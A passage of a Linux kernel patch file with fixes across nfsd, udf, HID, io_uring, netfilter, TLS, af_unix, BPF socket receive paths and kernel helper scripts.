+@@ -1100,7 +1100,9 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 	since = READ_ONCE(file->f_wb_err);
+ 	if (verf)
+ 		nfsd_copy_write_verifier(verf, nn);
++	file_start_write(file);
+ 	host_err = vfs_iter_write(file, &iter, &pos, flags);
++	file_end_write(file);
+ 	if (host_err < 0) {
+ 		nfsd_reset_write_verifier(nn);
+ 		trace_nfsd_writeverf_reset(nn, rqstp, host_err);
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index a1af2c2e1c295..7faa0a5af0260 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -438,7 +438,7 @@ static int udf_get_block(struct inode *inode, sector_t block,
+ 	 * Block beyond EOF and prealloc extents? Just discard preallocation
+ 	 * as it is not useful and complicates things.
+ 	 */
+-	if (((loff_t)block) << inode->i_blkbits > iinfo->i_lenExtents)
++	if (((loff_t)block) << inode->i_blkbits >= iinfo->i_lenExtents)
+ 		udf_discard_prealloc(inode);
+ 	udf_clear_extent_cache(inode);
+ 	phys = inode_getblk(inode, block, &err, &new);
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 48563dc09e171..0a1ccc68e798a 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -827,6 +827,7 @@ struct hid_driver {
+  * @output_report: send output report to device
+  * @idle: send idle request to device
+  * @may_wakeup: return if device may act as a wakeup source during system-suspend
++ * @max_buffer_size: over-ride maximum data buffer size (default: HID_MAX_BUFFER_SIZE)
+  */
+ struct hid_ll_driver {
+ 	int (*start)(struct hid_device *hdev);
+@@ -852,6 +853,8 @@ struct hid_ll_driver {
+ 
+ 	int (*idle)(struct hid_device *hdev, int report, int idle, int reqtype);
+ 	bool (*may_wakeup)(struct hid_device *hdev);
++
++	unsigned int max_buffer_size;
+ };
+ 
+ extern struct hid_ll_driver i2c_hid_ll_driver;
+diff --git a/include/linux/mhi_ep.h b/include/linux/mhi_ep.h
+index 478aece170462..f198a8ac7ee72 100644
+--- a/include/linux/mhi_ep.h
++++ b/include/linux/mhi_ep.h
+@@ -70,8 +70,8 @@ struct mhi_ep_db_info {
+  * @cmd_ctx_cache_phys: Physical address of the host command context cache
+  * @chdb: Array of channel doorbell interrupt info
+  * @event_lock: Lock for protecting event rings
+- * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @state_lock: Lock for protecting state transitions
++ * @list_lock: Lock for protecting state transition and channel doorbell lists
+  * @st_transition_list: List of state transitions
+  * @ch_db_list: List of queued channel doorbells
+  * @wq: Dedicated workqueue for handling rings and state changes
+@@ -117,8 +117,8 @@ struct mhi_ep_cntrl {
+ 
+ 	struct mhi_ep_db_info chdb[4];
+ 	struct mutex event_lock;
++	struct mutex state_lock;
+ 	spinlock_t list_lock;
+-	spinlock_t state_lock;
+ 
+ 	struct list_head st_transition_list;
+ 	struct list_head ch_db_list;
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index bc8f484cdcf3b..45c3d62e616d8 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3094,6 +3094,8 @@
+ 
+ #define PCI_VENDOR_ID_3COM_2		0xa727
+ 
++#define PCI_VENDOR_ID_SOLIDRUN		0xd063
++
+ #define PCI_VENDOR_ID_DIGIUM		0xd161
+ #define PCI_DEVICE_ID_DIGIUM_HFC4S	0xb410
+ 
+diff --git a/include/net/netfilter/nf_tproxy.h b/include/net/netfilter/nf_tproxy.h
+index 82d0e41b76f22..faa108b1ba675 100644
+--- a/include/net/netfilter/nf_tproxy.h
++++ b/include/net/netfilter/nf_tproxy.h
+@@ -17,6 +17,13 @@ static inline bool nf_tproxy_sk_is_transparent(struct sock *sk)
+ 	return false;
+ }
+ 
++static inline void nf_tproxy_twsk_deschedule_put(struct inet_timewait_sock *tw)
++{
++	local_bh_disable();
++	inet_twsk_deschedule_put(tw);
++	local_bh_enable();
++}
++
+ /* assign a socket to the skb -- consumes sk */
+ static inline void nf_tproxy_assign_sock(struct sk_buff *skb, struct sock *sk)
+ {
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 446a189b78b03..2e4c483075d33 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -108,7 +108,7 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	struct file *file = req->file;
+ 	int ret;
+ 
+-	if (!req->file->f_op->uring_cmd)
++	if (!file->f_op->uring_cmd)
+ 		return -EOPNOTSUPP;
+ 
+ 	ret = security_uring_cmd(ioucmd);
+@@ -120,6 +120,8 @@ int io_uring_cmd(struct io_kiocb *req, unsigned int issue_flags)
+ 	if (ctx->flags & IORING_SETUP_CQE32)
+ 		issue_flags |= IO_URING_F_CQE32;
+ 	if (ctx->flags & IORING_SETUP_IOPOLL) {
++		if (!file->f_op->uring_cmd_iopoll)
++			return -EOPNOTSUPP;
+ 		issue_flags |= IO_URING_F_IOPOLL;
+ 		req->iopoll_completed = 0;
+ 		WRITE_ONCE(ioucmd->cookie, NULL);
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 530e200fbc477..9880faa7e6760 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4476,6 +4476,7 @@ static int btf_datasec_resolve(struct btf_verifier_env *env,
+ 	struct btf *btf = env->btf;
+ 	u16 i;
+ 
++	env->resolve_mode = RESOLVE_TBD;
+ 	for_each_vsi_from(i, v->next_member, v->t, vsi) {
+ 		u32 var_type_id = vsi->type, type_id, type_size = 0;
+ 		const struct btf_type *var_type = btf_type_by_id(env->btf,
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 9f7fe35418978..8dd0127ddcb8d 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2933,7 +2933,7 @@ static bool clone3_args_valid(struct kernel_clone_args *kargs)
+ 	 * - make the CLONE_DETACHED bit reusable for clone3
+ 	 * - make the CSIGNAL bits reusable for clone3
+ 	 */
+-	if (kargs->flags & (CLONE_DETACHED | CSIGNAL))
++	if (kargs->flags & (CLONE_DETACHED | (CSIGNAL & (~CLONE_NEWTIME))))
+ 		return false;
+ 
+ 	if ((kargs->flags & (CLONE_SIGHAND | CLONE_CLEAR_SIGHAND)) ==
+diff --git a/kernel/watch_queue.c b/kernel/watch_queue.c
+index a6f9bdd956c39..f10f403104e7d 100644
+--- a/kernel/watch_queue.c
++++ b/kernel/watch_queue.c
+@@ -273,6 +273,7 @@ long watch_queue_set_size(struct pipe_inode_info *pipe, unsigned int nr_notes)
+ 	if (ret < 0)
+ 		goto error;
+ 
++	ret = -ENOMEM;
+ 	pages = kcalloc(sizeof(struct page *), nr_pages, GFP_KERNEL);
+ 	if (!pages)
+ 		goto error;
+diff --git a/net/caif/caif_usb.c b/net/caif/caif_usb.c
+index ebc202ffdd8d8..bf61ea4b8132d 100644
+--- a/net/caif/caif_usb.c
++++ b/net/caif/caif_usb.c
+@@ -134,6 +134,9 @@ static int cfusbl_device_notify(struct notifier_block *me, unsigned long what,
+ 	struct usb_device *usbdev;
+ 	int res;
+ 
++	if (what == NETDEV_UNREGISTER && dev->reg_state >= NETREG_UNREGISTERED)
++		return 0;
++
+ 	/* Check whether we have a NCM device, and find its VID/PID. */
+ 	if (!(dev->dev.parent && dev->dev.parent->driver &&
+ 	      strcmp(dev->dev.parent->driver->name, "cdc_ncm") == 0))
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 63680f999bf6d..9796a5fa6ceaa 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -2827,7 +2827,8 @@ static void sk_enter_memory_pressure(struct sock *sk)
+ static void sk_leave_memory_pressure(struct sock *sk)
+ {
+ 	if (sk->sk_prot->leave_memory_pressure) {
+-		sk->sk_prot->leave_memory_pressure(sk);
++		INDIRECT_CALL_INET_1(sk->sk_prot->leave_memory_pressure,
++				     tcp_leave_memory_pressure, sk);
+ 	} else {
+ 		unsigned long *memory_pressure = sk->sk_prot->memory_pressure;
+ 
+diff --git a/net/ipv4/netfilter/nf_tproxy_ipv4.c b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+index b22b2c745c76c..69e3317996043 100644
+--- a/net/ipv4/netfilter/nf_tproxy_ipv4.c
++++ b/net/ipv4/netfilter/nf_tproxy_ipv4.c
+@@ -38,7 +38,7 @@ nf_tproxy_handle_time_wait4(struct net *net, struct sk_buff *skb,
+ 					    hp->source, lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index cf26d65ca3893..ebf9175119370 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -186,6 +186,9 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+@@ -244,6 +247,9 @@ static int tcp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv4/udp_bpf.c b/net/ipv4/udp_bpf.c
+index e5dc91d0e0793..0735d820e413f 100644
+--- a/net/ipv4/udp_bpf.c
++++ b/net/ipv4/udp_bpf.c
+@@ -68,6 +68,9 @@ static int udp_bpf_recvmsg(struct sock *sk, struct msghdr *msg, size_t len,
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return sk_udp_recvmsg(sk, msg, len, flags, addr_len);
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index 47447f0241df6..bee45dfeb1874 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -477,6 +477,7 @@ int ila_xlat_nl_cmd_get_mapping(struct sk_buff *skb, struct genl_info *info)
+ 
+ 	rcu_read_lock();
+ 
++	ret = -ESRCH;
+ 	ila = ila_lookup_by_params(&xp, ilan);
+ 	if (ila) {
+ 		ret = ila_dump_info(ila,
+diff --git a/net/ipv6/netfilter/nf_tproxy_ipv6.c b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+index 929502e51203b..52f828bb5a83d 100644
+--- a/net/ipv6/netfilter/nf_tproxy_ipv6.c
++++ b/net/ipv6/netfilter/nf_tproxy_ipv6.c
+@@ -63,7 +63,7 @@ nf_tproxy_handle_time_wait6(struct sk_buff *skb, int tproto, int thoff,
+ 					    lport ? lport : hp->dest,
+ 					    skb->dev, NF_TPROXY_LOOKUP_LISTENER);
+ 		if (sk2) {
+-			inet_twsk_deschedule_put(inet_twsk(sk));
++			nf_tproxy_twsk_deschedule_put(inet_twsk(sk));
+ 			sk = sk2;
+ 		}
+ 	}
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index ead11a9c261f3..19e3afb23fdaf 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -96,8 +96,8 @@ static DEFINE_MUTEX(nf_conntrack_mutex);
+ #define GC_SCAN_MAX_DURATION	msecs_to_jiffies(10)
+ #define GC_SCAN_EXPIRED_MAX	(64000u / HZ)
+ 
+-#define MIN_CHAINLEN	8u
+-#define MAX_CHAINLEN	(32u - MIN_CHAINLEN)
++#define MIN_CHAINLEN	50u
++#define MAX_CHAINLEN	(80u - MIN_CHAINLEN)
+ 
+ static struct conntrack_gc_work conntrack_gc_work;
+ 
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index 733bb56950c14..d095d3c1ceca6 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -328,11 +328,12 @@ nla_put_failure:
+ }
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct)
++static int ctnetlink_dump_mark(struct sk_buff *skb, const struct nf_conn *ct,
++			       bool dump)
+ {
+ 	u32 mark = READ_ONCE(ct->mark);
+ 
+-	if (!mark)
++	if (!mark && !dump)
+ 		return 0;
+ 
+ 	if (nla_put_be32(skb, CTA_MARK, htonl(mark)))
+@@ -343,7 +344,7 @@ nla_put_failure:
+ 	return -1;
+ }
+ #else
+-#define ctnetlink_dump_mark(a, b) (0)
++#define ctnetlink_dump_mark(a, b, c) (0)
+ #endif
+ 
+ #ifdef CONFIG_NF_CONNTRACK_SECMARK
+@@ -548,7 +549,7 @@ static int ctnetlink_dump_extinfo(struct sk_buff *skb,
+ static int ctnetlink_dump_info(struct sk_buff *skb, struct nf_conn *ct)
+ {
+ 	if (ctnetlink_dump_status(skb, ct) < 0 ||
+-	    ctnetlink_dump_mark(skb, ct) < 0 ||
++	    ctnetlink_dump_mark(skb, ct, true) < 0 ||
+ 	    ctnetlink_dump_secctx(skb, ct) < 0 ||
+ 	    ctnetlink_dump_id(skb, ct) < 0 ||
+ 	    ctnetlink_dump_use(skb, ct) < 0 ||
+@@ -831,8 +832,7 @@ ctnetlink_conntrack_event(unsigned int events, const struct nf_ct_event *item)
+ 	}
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (events & (1 << IPCT_MARK) &&
+-	    ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, events & (1 << IPCT_MARK)))
+ 		goto nla_put_failure;
+ #endif
+ 	nlmsg_end(skb, nlh);
+@@ -2735,7 +2735,7 @@ static int __ctnetlink_glue_build(struct sk_buff *skb, struct nf_conn *ct)
+ 		goto nla_put_failure;
+ 
+ #ifdef CONFIG_NF_CONNTRACK_MARK
+-	if (ctnetlink_dump_mark(skb, ct) < 0)
++	if (ctnetlink_dump_mark(skb, ct, true) < 0)
+ 		goto nla_put_failure;
+ #endif
+ 	if (ctnetlink_dump_labels(skb, ct) < 0)
+diff --git a/net/netfilter/nft_last.c b/net/netfilter/nft_last.c
+index 7f2bda6641bd8..8e6d7eaf9dc8b 100644
+--- a/net/netfilter/nft_last.c
++++ b/net/netfilter/nft_last.c
+@@ -105,11 +105,15 @@ static void nft_last_destroy(const struct nft_ctx *ctx,
+ static int nft_last_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_last_priv *priv_dst = nft_expr_priv(dst);
++	struct nft_last_priv *priv_src = nft_expr_priv(src);
+ 
+ 	priv_dst->last = kzalloc(sizeof(*priv_dst->last), GFP_ATOMIC);
+ 	if (!priv_dst->last)
+ 		return -ENOMEM;
+ 
++	priv_dst->last->set = priv_src->last->set;
++	priv_dst->last->jiffies = priv_src->last->jiffies;
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nft_quota.c b/net/netfilter/nft_quota.c
+index 123578e289179..3ba12a7471b0f 100644
+--- a/net/netfilter/nft_quota.c
++++ b/net/netfilter/nft_quota.c
+@@ -236,12 +236,16 @@ static void nft_quota_destroy(const struct nft_ctx *ctx,
+ static int nft_quota_clone(struct nft_expr *dst, const struct nft_expr *src)
+ {
+ 	struct nft_quota *priv_dst = nft_expr_priv(dst);
++	struct nft_quota *priv_src = nft_expr_priv(src);
++
++	priv_dst->quota = priv_src->quota;
++	priv_dst->flags = priv_src->flags;
+ 
+ 	priv_dst->consumed = kmalloc(sizeof(*priv_dst->consumed), GFP_ATOMIC);
+ 	if (!priv_dst->consumed)
+ 		return -ENOMEM;
+ 
+-	atomic64_set(priv_dst->consumed, 0);
++	*priv_dst->consumed = *priv_src->consumed;
+ 
+ 	return 0;
+ }
+diff --git a/net/nfc/netlink.c b/net/nfc/netlink.c
+index 348bf561bc9fb..b9264e730fd93 100644
+--- a/net/nfc/netlink.c
++++ b/net/nfc/netlink.c
+@@ -1446,8 +1446,8 @@ static int nfc_se_io(struct nfc_dev *dev, u32 se_idx,
+ 	return rc;
+ 
+ error:
+-	kfree(cb_context);
+ 	device_unlock(&dev->dev);
++	kfree(cb_context);
+ 	return rc;
+ }
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d9413d43b1045..e8018b0fb7676 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -2644,16 +2644,14 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct smc_sock *smc;
+-	int rc = -EPIPE;
++	int rc;
+ 
+ 	smc = smc_sk(sk);
+ 	lock_sock(sk);
+-	if ((sk->sk_state != SMC_ACTIVE) &&
+-	    (sk->sk_state != SMC_APPCLOSEWAIT1) &&
+-	    (sk->sk_state != SMC_INIT))
+-		goto out;
+ 
++	/* SMC does not support connect with fastopen */
+ 	if (msg->msg_flags & MSG_FASTOPEN) {
++		/* not connected yet, fallback */
+ 		if (sk->sk_state == SMC_INIT && !smc->connect_nonblock) {
+ 			rc = smc_switch_to_fallback(smc, SMC_CLC_DECL_OPTUNSUPP);
+ 			if (rc)
+@@ -2662,6 +2660,11 @@ static int smc_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
++	} else if ((sk->sk_state != SMC_ACTIVE) &&
++		   (sk->sk_state != SMC_APPCLOSEWAIT1) &&
++		   (sk->sk_state != SMC_INIT)) {
++		rc = -EPIPE;
++		goto out;
+ 	}
+ 
+ 	if (smc->use_fallback) {
+diff --git a/net/sunrpc/svc.c b/net/sunrpc/svc.c
+index f06622814a958..7f9807374b0fb 100644
+--- a/net/sunrpc/svc.c
++++ b/net/sunrpc/svc.c
+@@ -786,6 +786,7 @@ svc_start_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ static int
+ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ {
++	struct svc_rqst	*rqstp;
+ 	struct task_struct *task;
+ 	unsigned int state = serv->sv_nrthreads-1;
+ 
+@@ -794,7 +795,10 @@ svc_stop_kthreads(struct svc_serv *serv, struct svc_pool *pool, int nrservs)
+ 		task = choose_victim(serv, pool, &state);
+ 		if (task == NULL)
+ 			break;
+-		kthread_stop(task);
++		rqstp = kthread_data(task);
++		/* Did we lose a race to svo_function threadfn? */
++		if (kthread_stop(task) == -EINTR)
++			svc_exit_thread(rqstp);
+ 		nrservs++;
+ 	} while (nrservs < 0);
+ 	return 0;
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index 6c593788dc250..a7cc4f9faac28 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -508,6 +508,8 @@ handle_error:
+ 			zc_pfrag.offset = iter_offset.offset;
+ 			zc_pfrag.size = copy;
+ 			tls_append_frag(record, &zc_pfrag, copy);
++
++			iter_offset.offset += copy;
+ 		} else if (copy) {
+ 			copy = min_t(size_t, copy, pfrag->size - pfrag->offset);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 3735cb00905df..b32c112984dd9 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -405,13 +405,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_128,
+ 				 sizeof(*crypto_info_aes_gcm_128)))
+@@ -429,13 +427,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aes_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_AES_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aes_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aes_gcm_256,
+ 				 sizeof(*crypto_info_aes_gcm_256)))
+@@ -451,13 +447,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(aes_ccm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_AES_CCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_AES_CCM_128_IV_SIZE);
+ 		memcpy(aes_ccm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_AES_CCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, aes_ccm_128, sizeof(*aes_ccm_128)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -472,13 +466,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(chacha20_poly1305->iv,
+ 		       cctx->iv + TLS_CIPHER_CHACHA20_POLY1305_SALT_SIZE,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_IV_SIZE);
+ 		memcpy(chacha20_poly1305->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_CHACHA20_POLY1305_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, chacha20_poly1305,
+ 				sizeof(*chacha20_poly1305)))
+ 			rc = -EFAULT;
+@@ -493,13 +485,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_gcm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_GCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_GCM_IV_SIZE);
+ 		memcpy(sm4_gcm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_GCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_gcm_info, sizeof(*sm4_gcm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -513,13 +503,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(sm4_ccm_info->iv,
+ 		       cctx->iv + TLS_CIPHER_SM4_CCM_SALT_SIZE,
+ 		       TLS_CIPHER_SM4_CCM_IV_SIZE);
+ 		memcpy(sm4_ccm_info->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_SM4_CCM_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval, sm4_ccm_info, sizeof(*sm4_ccm_info)))
+ 			rc = -EFAULT;
+ 		break;
+@@ -535,13 +523,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_128->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_128_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_128_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_128->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_128_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_128,
+ 				 sizeof(*crypto_info_aria_gcm_128)))
+@@ -559,13 +545,11 @@ static int do_tls_getsockopt_conf(struct sock *sk, char __user *optval,
+ 			rc = -EINVAL;
+ 			goto out;
+ 		}
+-		lock_sock(sk);
+ 		memcpy(crypto_info_aria_gcm_256->iv,
+ 		       cctx->iv + TLS_CIPHER_ARIA_GCM_256_SALT_SIZE,
+ 		       TLS_CIPHER_ARIA_GCM_256_IV_SIZE);
+ 		memcpy(crypto_info_aria_gcm_256->rec_seq, cctx->rec_seq,
+ 		       TLS_CIPHER_ARIA_GCM_256_REC_SEQ_SIZE);
+-		release_sock(sk);
+ 		if (copy_to_user(optval,
+ 				 crypto_info_aria_gcm_256,
+ 				 sizeof(*crypto_info_aria_gcm_256)))
+@@ -614,11 +598,9 @@ static int do_tls_getsockopt_no_pad(struct sock *sk, char __user *optval,
+ 	if (len < sizeof(value))
+ 		return -EINVAL;
+ 
+-	lock_sock(sk);
+ 	value = -EINVAL;
+ 	if (ctx->rx_conf == TLS_SW || ctx->rx_conf == TLS_HW)
+ 		value = ctx->rx_no_pad;
+-	release_sock(sk);
+ 	if (value < 0)
+ 		return value;
+ 
+@@ -635,6 +617,8 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ {
+ 	int rc = 0;
+ 
++	lock_sock(sk);
++
+ 	switch (optname) {
+ 	case TLS_TX:
+ 	case TLS_RX:
+@@ -651,6 +635,9 @@ static int do_tls_getsockopt(struct sock *sk, int optname,
+ 		rc = -ENOPROTOOPT;
+ 		break;
+ 	}
++
++	release_sock(sk);
++
+ 	return rc;
+ }
+ 
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 38dcd9b401027..992092aeebad9 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -2114,7 +2114,7 @@ recv_end:
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek);
+-		decrypted = max(err, 0);
++		decrypted += max(err, 0);
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index f0c2293f1d3b8..7d17601ceee79 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -2104,7 +2104,8 @@ out:
+ #define UNIX_SKB_FRAGS_SZ (PAGE_SIZE << get_order(32768))
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other)
++static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other,
++		     struct scm_cookie *scm, bool fds_sent)
+ {
+ 	struct unix_sock *ousk = unix_sk(other);
+ 	struct sk_buff *skb;
+@@ -2115,6 +2116,11 @@ static int queue_oob(struct socket *sock, struct msghdr *msg, struct sock *other
+ 	if (!skb)
+ 		return err;
+ 
++	err = unix_scm_to_skb(scm, skb, !fds_sent);
++	if (err < 0) {
++		kfree_skb(skb);
++		return err;
++	}
+ 	skb_put(skb, 1);
+ 	err = skb_copy_datagram_from_iter(skb, 0, &msg->msg_iter, 1);
+ 
+@@ -2242,7 +2248,7 @@ static int unix_stream_sendmsg(struct socket *sock, struct msghdr *msg,
+ 
+ #if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+ 	if (msg->msg_flags & MSG_OOB) {
+-		err = queue_oob(sock, msg, other);
++		err = queue_oob(sock, msg, other, &scm, fds_sent);
+ 		if (err)
+ 			goto out_err;
+ 		sent++;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index e9bf155139612..2f9d8271c6ec7 100644
+--- a/net/unix/unix_bpf.c
++++ b/net/unix/unix_bpf.c
+@@ -54,6 +54,9 @@ static int unix_bpf_recvmsg(struct sock *sk, struct msghdr *msg,
+ 	struct sk_psock *psock;
+ 	int copied;
+ 
++	if (!len)
++		return 0;
++
+ 	psock = sk_psock_get(sk);
+ 	if (unlikely(!psock))
+ 		return __unix_recvmsg(sk, msg, len, flags);
+diff --git a/scripts/checkkconfigsymbols.py b/scripts/checkkconfigsymbols.py
+index 217d21abc86e8..36c920e713137 100755
+--- a/scripts/checkkconfigsymbols.py
++++ b/scripts/checkkconfigsymbols.py
+@@ -115,7 +115,7 @@ def parse_options():
+     return args
+ 
+ 
+-def main():
++def print_undefined_symbols():
+     """Main function of this module."""
+     args = parse_options()
+ 
+@@ -467,5 +467,16 @@ def parse_kconfig_file(kfile):
+     return defined, references
+ 
+ 
++def main():
++    try:
++        print_undefined_symbols()
++    except BrokenPipeError:
++        # Python flushes standard streams on exit; redirect remaining output
++        # to devnull to avoid another BrokenPipeError at shutdown
++        devnull = os.open(os.devnull, os.O_WRONLY)
++        os.dup2(devnull, sys.stdout.fileno())
++        sys.exit(1)  # Python exits with error code 1 on EPIPE
++
++
+ if __name__ == "__main__":
+     main()
+diff --git a/scripts/clang-tools/run-clang-tools.py b/scripts/clang-tools/run-clang-tools.py
+index 56f2ec8f0f40a..3266708a86586 100755
+--- a/scripts/clang-tools/run-clang-tools.py
